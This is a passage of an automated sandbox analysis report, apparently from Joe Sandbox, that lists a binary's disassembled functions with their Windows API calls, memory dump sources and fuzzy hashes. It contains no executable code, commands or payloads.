                                                                                                                                                                                                                                          • WriteFile.KERNEL32(?,00113CD6,00000000,00105BA3,00000000,?,?,?,?,?,?,?,?,?,00105BA3,?), ref: 0010554B
                                                                                                                                                                                                                                          • WriteFile.KERNEL32(?,?,00000001,00105BA3,00000000,?,?,?,?,?,?,?,?,?,00105BA3,?), ref: 00105584
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1324828854-0
                                                                                                                                                                                                                                          • Opcode ID: 3625f94644465196db64afa58541b48184daf9acf1a29ae16100a0f262994574
                                                                                                                                                                                                                                          • Instruction ID: 7f839cca370acca6ee18fa5bd6f3843ded79b6468a3d4ab8d1e9147534226bf2
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3625f94644465196db64afa58541b48184daf9acf1a29ae16100a0f262994574
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9351A4B1A006499FDB11CFA8DC45AEEBBFAEF09300F14415AF595E7291E7B09A41CF60
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 000F2D20 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 117COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • _ValidateLocalCookies.LIBCMT ref: 000F2D4B
                                                                                                                                                                                                                                          • ___except_validate_context_record.LIBVCRUNTIME ref: 000F2D53
                                                                                                                                                                                                                                          • _ValidateLocalCookies.LIBCMT ref: 000F2DE1
                                                                                                                                                                                                                                          • __IsNonwritableInCurrentImage.LIBCMT ref: 000F2E0C
                                                                                                                                                                                                                                          • _ValidateLocalCookies.LIBCMT ref: 000F2E61
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                                                                                          • String ID: csm
                                                                                                                                                                                                                                          • API String ID: 1170836740-1018135373
                                                                                                                                                                                                                                          • Opcode ID: 6b485e12a04a4c60f7bd4469490d2a55840c4e0b39a96f19f5095ae3e4594050
                                                                                                                                                                                                                                          • Instruction ID: ad21497d6b08b2c94cb726cc889f084dc559744158a2a787573d2a08e59ae2d3
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6b485e12a04a4c60f7bd4469490d2a55840c4e0b39a96f19f5095ae3e4594050
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DB41D034A0020DABCF10DF68C845AFEBBF4BF44324F148155EA14ABB92DB35AA41DBD0
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 001510B8 Relevance: 10.6, APIs: 7, Instructions: 110networkCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 0015304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 0015307A
                                                                                                                                                                                                                                            • Part of subcall function 0015304E: _wcslen.LIBCMT ref: 0015309B
                                                                                                                                                                                                                                          • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00151112
                                                                                                                                                                                                                                          • WSAGetLastError.WSOCK32 ref: 00151121
                                                                                                                                                                                                                                          • WSAGetLastError.WSOCK32 ref: 001511C9
                                                                                                                                                                                                                                          • closesocket.WSOCK32(00000000), ref: 001511F9
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ErrorLast$_wcslenclosesocketinet_addrsocket
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2675159561-0
                                                                                                                                                                                                                                          • Opcode ID: 67862e2d18079c58ea14cff729c3d46c76106175e6e6c73de7e024e1d3d23c45
                                                                                                                                                                                                                                          • Instruction ID: 8223cfe405173d07067c9f8afec1c95294e80a05311fb60d810368bac1780f64
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 67862e2d18079c58ea14cff729c3d46c76106175e6e6c73de7e024e1d3d23c45
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 32411631200604EFDB119F24CC84BA9B7E9EF44325F148099FD699F292C774AD85CBE0
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 0013CF00 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 108filestringCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 0013DDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,0013CF22,?), ref: 0013DDFD
                                                                                                                                                                                                                                            • Part of subcall function 0013DDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,0013CF22,?), ref: 0013DE16
                                                                                                                                                                                                                                          • lstrcmpiW.KERNEL32(?,?), ref: 0013CF45
                                                                                                                                                                                                                                          • MoveFileW.KERNEL32(?,?), ref: 0013CF7F
                                                                                                                                                                                                                                          • _wcslen.LIBCMT ref: 0013D005
                                                                                                                                                                                                                                          • _wcslen.LIBCMT ref: 0013D01B
                                                                                                                                                                                                                                          • SHFileOperationW.SHELL32(?), ref: 0013D061
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: FileFullNamePath_wcslen$MoveOperationlstrcmpi
                                                                                                                                                                                                                                          • String ID: \*.*
                                                                                                                                                                                                                                          • API String ID: 3164238972-1173974218
                                                                                                                                                                                                                                          • Opcode ID: 6542f435f58e421bca872ade92c8704e7aa9e6feddd30ce7166a1e901e6c6241
                                                                                                                                                                                                                                          • Instruction ID: 743327101156388396cb9a84d02346c4db3c95ef7e6f1773f92529a652480ec3
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6542f435f58e421bca872ade92c8704e7aa9e6feddd30ce7166a1e901e6c6241
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EB415471D052185FDF16EBA4DD81AEEB7BDAF18380F1000E6E505EB142EB34AA88CF50
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 00162DFD Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 00162E1C
                                                                                                                                                                                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 00162E4F
                                                                                                                                                                                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 00162E84
                                                                                                                                                                                                                                          • SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 00162EB6
                                                                                                                                                                                                                                          • SendMessageW.USER32(?,000000F1,00000001,00000000), ref: 00162EE0
                                                                                                                                                                                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 00162EF1
                                                                                                                                                                                                                                          • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00162F0B
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: LongWindow$MessageSend
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2178440468-0
                                                                                                                                                                                                                                          • Opcode ID: 6bfaad06e70af410e2d3dee369859b31eeb4da8e5d5d6b1275e1cdb6e2ce914d
                                                                                                                                                                                                                                          • Instruction ID: b352bf1154092950d44a07f64fd6d0601cff034a111b325240eb39863832545a
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6bfaad06e70af410e2d3dee369859b31eeb4da8e5d5d6b1275e1cdb6e2ce914d
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 35312230A44650AFEB20CF58DC84FA537E0FB9A710F1501A5F9508F6B2CBB2A8A0DB41
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 00137726 Relevance: 10.6, APIs: 7, Instructions: 94memoryCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00137769
                                                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0013778F
                                                                                                                                                                                                                                          • SysAllocString.OLEAUT32(00000000), ref: 00137792
                                                                                                                                                                                                                                          • SysAllocString.OLEAUT32(?), ref: 001377B0
                                                                                                                                                                                                                                          • SysFreeString.OLEAUT32(?), ref: 001377B9
                                                                                                                                                                                                                                          • StringFromGUID2.OLE32(?,?,00000028), ref: 001377DE
                                                                                                                                                                                                                                          • SysAllocString.OLEAUT32(?), ref: 001377EC
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3761583154-0
                                                                                                                                                                                                                                          • Opcode ID: 24d1829a1dd01482142d45ce7c7e70047bcddc367871a84a05813c84a9634ea3
                                                                                                                                                                                                                                          • Instruction ID: bdebcc6de58ddf0d12b79a8a537e4a56fdd29c5155d83c200d851a603f479807
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 24d1829a1dd01482142d45ce7c7e70047bcddc367871a84a05813c84a9634ea3
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0D21A776608219AFDF20DFA9CC88CBB77ACEB09764B048425F915DB291D770DC45C7A0
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 001377FD Relevance: 10.6, APIs: 7, Instructions: 89memoryCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00137842
                                                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00137868
                                                                                                                                                                                                                                          • SysAllocString.OLEAUT32(00000000), ref: 0013786B
                                                                                                                                                                                                                                          • SysAllocString.OLEAUT32 ref: 0013788C
                                                                                                                                                                                                                                          • SysFreeString.OLEAUT32 ref: 00137895
                                                                                                                                                                                                                                          • StringFromGUID2.OLE32(?,?,00000028), ref: 001378AF
                                                                                                                                                                                                                                          • SysAllocString.OLEAUT32(?), ref: 001378BD
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3761583154-0
                                                                                                                                                                                                                                          • Opcode ID: 640cccbdfafebdf25c6ed84cbf656c7cf3cb9654acb3ef95e9a8a02e32062807
                                                                                                                                                                                                                                          • Instruction ID: 889989a2a803b875520df34afe54b3e663f8f93520dc8b8c1fd27c14dbcbc57c
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 640cccbdfafebdf25c6ed84cbf656c7cf3cb9654acb3ef95e9a8a02e32062807
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1D21A471605215AFDF209FA9DC88DBA77ECEB09360B108165F915DB2A1DB70DC81CB64
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 001404D2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetStdHandle.KERNEL32(0000000C), ref: 001404F2
                                                                                                                                                                                                                                          • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 0014052E
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CreateHandlePipe
                                                                                                                                                                                                                                          • String ID: nul
                                                                                                                                                                                                                                          • API String ID: 1424370930-2873401336
                                                                                                                                                                                                                                          • Opcode ID: 189ae099c5387043a0041a88115f1be2d7c818fd4bf88cb277cabb0dbc1b90a4
                                                                                                                                                                                                                                          • Instruction ID: b0d21ee9da08b92cba0cb7efb6f599c54045ecca6e563f3b3aabda02d0d87f4b
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 189ae099c5387043a0041a88115f1be2d7c818fd4bf88cb277cabb0dbc1b90a4
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8D2162755003059FDF219F2ADC44A5A77A4FF49764F204A19F9A1DB2F0D7709940CF60
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 001405A7 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetStdHandle.KERNEL32(000000F6), ref: 001405C6
                                                                                                                                                                                                                                          • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00140601
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CreateHandlePipe
                                                                                                                                                                                                                                          • String ID: nul
                                                                                                                                                                                                                                          • API String ID: 1424370930-2873401336
                                                                                                                                                                                                                                          • Opcode ID: e85615d25a850a6902fb2d96e029d2153f8d28b19d96baa0cc574bac78509eff
                                                                                                                                                                                                                                          • Instruction ID: 47783680172b02caf423bb28da22b1d1927e4425302a10b32028ce460b5a87eb
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e85615d25a850a6902fb2d96e029d2153f8d28b19d96baa0cc574bac78509eff
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1C2183755003159FDB219F6A8C04A6A77E4BF99720F214A1DFEA2E72F0D7B09860CB50
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 001640AD Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 000D600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 000D604C
                                                                                                                                                                                                                                            • Part of subcall function 000D600E: GetStockObject.GDI32(00000011), ref: 000D6060
                                                                                                                                                                                                                                            • Part of subcall function 000D600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 000D606A
                                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00164112
                                                                                                                                                                                                                                          • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 0016411F
                                                                                                                                                                                                                                          • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 0016412A
                                                                                                                                                                                                                                          • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00164139
                                                                                                                                                                                                                                          • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00164145
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: MessageSend$CreateObjectStockWindow
                                                                                                                                                                                                                                          • String ID: Msctls_Progress32
                                                                                                                                                                                                                                          • API String ID: 1025951953-3636473452
                                                                                                                                                                                                                                          • Opcode ID: 6a86107896316c37b62c18901f00f14cd47035e748bd8d8b1857b4418cb62fc8
                                                                                                                                                                                                                                          • Instruction ID: 07a275fe8973462f8bec99e70eca3aa8cdcc8d52203b6a954619a6e71c39ab16
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6a86107896316c37b62c18901f00f14cd47035e748bd8d8b1857b4418cb62fc8
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5C1190B2150219BFEF119E64CC85EE77F5DEF09798F014111BA18A2190C7729C619BA4
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 0010D7DF Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 0010D7A3: _free.LIBCMT ref: 0010D7CC
                                                                                                                                                                                                                                          • _free.LIBCMT ref: 0010D82D
                                                                                                                                                                                                                                            • Part of subcall function 001029C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0010D7D1,00000000,00000000,00000000,00000000,?,0010D7F8,00000000,00000007,00000000,?,0010DBF5,00000000), ref: 001029DE
                                                                                                                                                                                                                                            • Part of subcall function 001029C8: GetLastError.KERNEL32(00000000,?,0010D7D1,00000000,00000000,00000000,00000000,?,0010D7F8,00000000,00000007,00000000,?,0010DBF5,00000000,00000000), ref: 001029F0
                                                                                                                                                                                                                                          • _free.LIBCMT ref: 0010D838
                                                                                                                                                                                                                                          • _free.LIBCMT ref: 0010D843
                                                                                                                                                                                                                                          • _free.LIBCMT ref: 0010D897
                                                                                                                                                                                                                                          • _free.LIBCMT ref: 0010D8A2
                                                                                                                                                                                                                                          • _free.LIBCMT ref: 0010D8AD
                                                                                                                                                                                                                                          • _free.LIBCMT ref: 0010D8B8
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 776569668-0
                                                                                                                                                                                                                                          • Opcode ID: d5e9bbcb1dbdafe4c8d3bd98f36014f41f46dc5d4a3df644b036f3c2391e0fc8
                                                                                                                                                                                                                                          • Instruction ID: 135b7668ab1a7edf44fe74edd5e6d24757717b191838c25d4d2104079719e6fa
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d5e9bbcb1dbdafe4c8d3bd98f36014f41f46dc5d4a3df644b036f3c2391e0fc8
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0F115B71940B18AADA21BFF4DC4BFCB7BDCAF60704F404825F2D9A60D2DBB5B5058662
